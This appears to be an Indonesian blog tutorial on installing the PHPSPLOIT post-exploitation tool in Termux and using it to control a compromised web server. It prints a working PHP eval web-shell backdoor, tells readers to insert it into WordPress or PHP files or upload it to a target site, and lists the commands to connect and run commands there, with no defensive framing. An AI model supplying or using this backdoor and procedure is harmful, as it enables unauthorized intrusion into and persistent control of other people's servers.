Backconnect atau Reverse Shell Dengan PHPSPLOIT
Cara BackConnect atau Reverse Shell Dengan Phpsploit Termux Android
Cara melakukan Back Connect atau Reverse Shell Dengan PHPSPLOIT, Melakukan reverse shell atau backconnect sebenarnya sangat mudah. kalian bisa menggunakan berbagai cara untuk melakukan backconnect. misalnya dengan cara backconnect melalui bind port shell, bash shell, python shell, atau bisa juga dengan ngrok.
Dan pada artikel kali ini kita akan melakukan backconnect shell backdoor dengan bantuan tools PHPSPLOIT.
Apa itu PHPSPLOIT ?
Melalui HTTP antara klien dan server web. ini adalah alat pasca-eksploitasi yang mampu mempertahankan akses ke server web yang di susupi untuk tujuan peningkatan hak istimewa.
Cara Install PHPSPLOIT Di Termux
Sebelum kita melakukan backconnect pastikan kalian sudah memiliki aplikasi Termux yang sudah terinstall package git dan python. Dan memiliki akses shell backdoor.Jika kalian sudah memilikinya kalian tinggal instalasi Phpsploit dengan mengikuti langkahnya berikut:
Langkah pertama: silahkan kalian jalankan cloning repository Phpsploit:
git clone https://github.com/nil0x42/phpsploit
jika proses sudah selesai. Lalu masuk ke dalam direktori phpsploit, dengan perintah:
cd phpsploit
lalu kalian tinggal melakukan instalasi requirements nya, dengan perintah:
pip install -r requirements.txt
Jika sudah selesai tinggal kalian masukan perintah:
chmod +x phpsploit
Dan untuk menjalankannya kalian tinggal mengetikan commands:
./phpsploit
Maka selesai, kalian bisa lanjut ke tutorial backconnect atau reverse shell nya.
Cara Backconnect atau Reverse Shell dengan PHPSPLOIT
Saat menjalankan Phpsploit dan membuat backdoor standar untuk ditempatkan di WordPress atau kode PHP, tampilannya seperti ini:<?php @eval($_SERVER['HTTP_PHPSPL01T']); ?>
Kode di atas dapat dihasilkan dengan menjalankan perintah berikut:
$phpsploit > set PASSKEY YUKINOSEC
maka akan menghasilkan kode:<?php @eval($_SERVER['HTTP_YUKINOSEC']); ?>
Kalian bisa menyisipkan kode remote tersebut ke dalam skrip file PHP di server web, atau bisa juga dengan menyimpannya misal yukisec.php Dan kalian upload ke server target web kalian.Dan untuk melakukan reverse shell nya kalian bisa masuk lagi ke aplikasi Termux kalian. lalu jalankan Phpsploit.
jika sudah, kalian tinggal mengetikan perintah:
$phpsploit > set TARGET http://vulnweb.com/yukisec.php
Lalu kalian tekan Enter dan masukan perintah:
$phpsploit > exploit
Tekan Enter.
Dan boom kalian berhasil melakukan backconnect dengan Phpsploit kalian tidak perlu repot lagi untuk melakukan bind port, jalankan ngrok atau semacamnya. Dan untuk mengeceknya kalian bisa jalankan:
$phpsploit > run ls
Begitulah caranya melakukan backconnect dengan Phpsploit yang saya rasa ini adalah cara paling mudah dan bahkan simple, tanpa perlu repot-repot melakukan ini itu. Selanjutnya kalian bsa melakukan apa yang kalian inginkan hehe ~.